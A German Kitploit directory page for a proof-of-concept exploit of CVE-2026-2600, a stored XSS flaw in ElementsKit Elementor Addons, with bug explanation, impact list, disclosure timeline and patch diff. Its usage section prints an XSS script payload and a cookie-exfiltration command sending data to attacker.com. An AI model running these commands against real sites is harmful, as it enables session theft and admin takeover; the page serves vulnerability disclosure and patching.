Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-2600-POC — Proof-of-Concept-Exploit für CVE-2026-2600, eine gespeicherte XSS-Schwachstelle in ElementsKit Elementor Addons <= 3.7.9, die es authentifizierten Contributoren ermöglicht, beliebige Skripte über manipulierte Elementor-Daten einzuschleusen. | Kitploit
Tools/GitHubGitHub/folks-iwd/cve-2026-2600-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

Proof-of-Concept-Exploit für CVE-2026-2600, eine gespeicherte XSS-Schwachstelle in ElementsKit Elementor Addons <= 3.7.9, die es authentifizierten Contributoren ermöglicht, beliebige Skripte über manipulierte Elementor-Daten einzuschleusen.

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — Authenticated (Contributor+) Stored Cross-Site Scripting

CVSS6.4 MEDIUM
Betroffen<= 3.7.9
Behoben3.8.0
Min. RolleContributor (edit_posts)
VektorNetzwerk / Geringe Komplexität / Geringe Privilegien

Der Fehler

Das Simple-Tab-Widget rendert Tab-Titel mit echo-Ausgabe, aber ohne Output-Escaping. In widgets/tab/tab.php führt die Render-Schleife Folgendes aus:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

Der Elementor-Editor bereinigt Eingaben clientseitig, aber der REST-API-Endpunkt (/wp-json/wp/v2/posts/{id}) akzeptiert das _elementor_data-Meta-Feld direkt und umgeht diese Ebene vollständig.

Ein authentifizierter Contributor kann einen Beitrag mit einer manipulierten Elementor-JSON-Payload per PATCH ändern, die ekit_tab_title auf beliebiges HTML setzt. Da der Wert wörtlich in _elementor_data gespeichert und beim Rendern ohne esc_html() ausgegeben wird, wird das Skript im Browser jedes Besuchers ausgeführt, sobald die Seite geladen wird.

Auswirkungen

Jeder Contributor kann:

  • Sitzungs-Cookies und Authentifizierungstoken aller Seitenbesucher stehlen, einschließlich Administratoren
  • Admin-Konten übernehmen und zur vollständigen Übernahme der Website eskalieren
  • Keylogger oder Overlays zum Abgreifen von Zugangsdaten stillschweigend einsetzen
  • Besucher auf Phishing-Seiten oder Malware-Verteilungsseiten umleiten
  • Seiten dauerhaft verunstalten — die Payload bleibt bestehen, bis sie manuell entfernt wird

Zum Zeitpunkt der Offenlegung waren über 400.000 aktive Installationen betroffen.

Verwendung

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

Das Skript authentifiziert sich über HTTP, ruft den REST-Nonce aus dem Admin-Editor ab, erstellt einen Entwurfsbeitrag, patcht _elementor_data mit der XSS-Payload, die im ekit_tab_title-Feld eingebettet ist, und veröffentlicht den Beitrag. Die Ausgabe bestätigt, ob die Payload im Seitenquelltext aktiv ist.

root@kitploit:~
# Benutzerdefinierte Payload
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# Cookie-Exfiltration mit Callback
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# Interaktiver Konsolenmodus
python3 console_poc.py

Vollständiger Bericht

https://folks-iwd.github.io/writeups/cve-2026-2600.html

Offenlegungszeitplan

DatumEreignis
Januar 2026Entdeckt durch SVN-Diff-Review. PoC bestätigt.
Januar 2026Gemeldet an die Patchstack Alliance mit vollständigem Bericht und PoC.
März 2026Wpmet lieferte den Fix in v3.8.0.
April 2026CVE-2026-2600 veröffentlicht. CVSS 6.4 MEDIUM zugewiesen.

Der Patch

Wpmet hat esc_html() um die Tab-Titel-Ausgabe in widgets/tab/tab.php ergänzt:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
Tool herunterladen